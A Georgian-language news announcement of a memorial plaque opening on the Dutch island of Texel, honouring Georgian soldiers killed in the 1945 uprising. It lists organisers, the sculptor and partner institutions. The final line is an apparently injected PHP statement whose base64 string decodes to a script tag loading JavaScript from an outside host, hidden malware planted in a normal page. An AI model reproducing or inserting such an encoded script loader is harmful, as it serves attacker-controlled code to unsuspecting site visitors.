celsiusi
ავერსი საქკაბელი
2023 წლის 4 მაისს, ნიდერლანდების სამეფოში, კუნძულ ტექსელზე გაიმართება ნიდერლანდების სამეფოს ქართული კულტურის ცენტრის დამფუძნებლის, თიკა სვანიძე ვენკოსა და ტექსელის მოვლენების მკვლევრის, ისტორიკოს სულხან ამირანაშვილის ინიციატივით განხორციელებული პროექტის - „ტექსელის ქართველთა სასაფლაოზე მემორიალური დაფის დადგმა" გახსნის ცერემონია.
 
პროექტი „ტექსელის ქართველთა სასაფლაოზე მემორიალური დაფის დადგმა" განხორციელდა ნიდერლანდების სამეფოს ქართული კულტურის ცენტრის ორგანიზებით, კუნძულ ტექსელის მერიასთან და ნიდერლანდების სამეფოს თავდაცვის სამინისტროსთან თანამშრომლობით.
 
მემორიალის დიზაინის ავტორია ბელგიის სამეფოში მოღვაწე მოქანდაკე, რესტავრატორი დავით (დევი) ხმალაძე. 1945 წელს, ტექსელის ქართველთა აჯანყების დროს დაღუპული ჯარისკაცების ხსოვნისადმი მიძღვნილ მემორიალზე ამოტვიფრული იქნება ტექსელის ძმათა სასაფლაოზე დაკრძალული ქართველი ჯარისკაცების გვარ-სახელები. აღსანიშნავია, რომ ტექსელის ქართველთა სასაფლაოზე დაკრძალულ ქართველთა შორის, იდენტიფიცირებული არის ათამდე ჯარისკაცი ოკუპირებული აფხაზეთიდან და სამხრეთ ოსეთიდან. დაღუპულთა სიაში ასევე იდენტიფიცირებულია ებრაული წარმოშობის ათამდე ჯარისკაცის გვარ-სახელები. აღნიშნული ინფორმაცია დასტურდება კუნძულ ტექსელის ქართველთა აჯანყების საარქივო მასალებზე დაყრდნობით.
 
პროექტის „ტექსელის ქართველთა სასაფლაოზე მემორიალური დაფის დადგმა“ ფინანსური მხარდამჭერია ნიდერლანდების სამეფოს ქართული კულტურის ცენტრის დამფუძნებელი თიკა სვანიძე-ვენკო.
 
მემორიალის გახსნასთან დაკავშირებით გამართულ ღონისძიებაში მონაწილეობას მიიღებენ ქართული დიასპორის და დიასპორული ორგანიზაციების წარმომადგენლები 10-მდე ქვეყნიდან, ტექსელის ადგილობრივი მუნიციპალიტეტის ხელმძღვანელობა. მემორიალის გახსნის ცერემონიაზე მოწვეული იქნებიან ოფიციალური სტრუქტურების წარმომადგენლები საქართველოდან.
 
პროექტი „ტექსელის ქართველთა სასაფლაოზე მემორიალური დაფის დადგმა" განხორციელდა ნიდერლანდების სამეფოს ქართული კულტურის ცენტრის ორგანიზებით, კუნძულ ტექსელის მერიასთან და ნიდერლანდების სამეფოს თავდაცვის სამინისტროსთან თანამშრომლობით.
 
პროექტის პარტნიორები და თანაორგანიზატორები:
• საქართველოს საგარეო საქმეთა სამინისტრო
• საქართველოს საელჩო ნიდერლანდების სამეფოში
• მსოფლიოს ქართველ ებრაელთა მთავარი რაბინი იაკობ გაგულაშვილი
• ფონდი „დიასპორების ალიანსი საქართველოსთვის“
• კუნძულ ტექსელის ადგილობრივი თვითმმართველობა
299
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");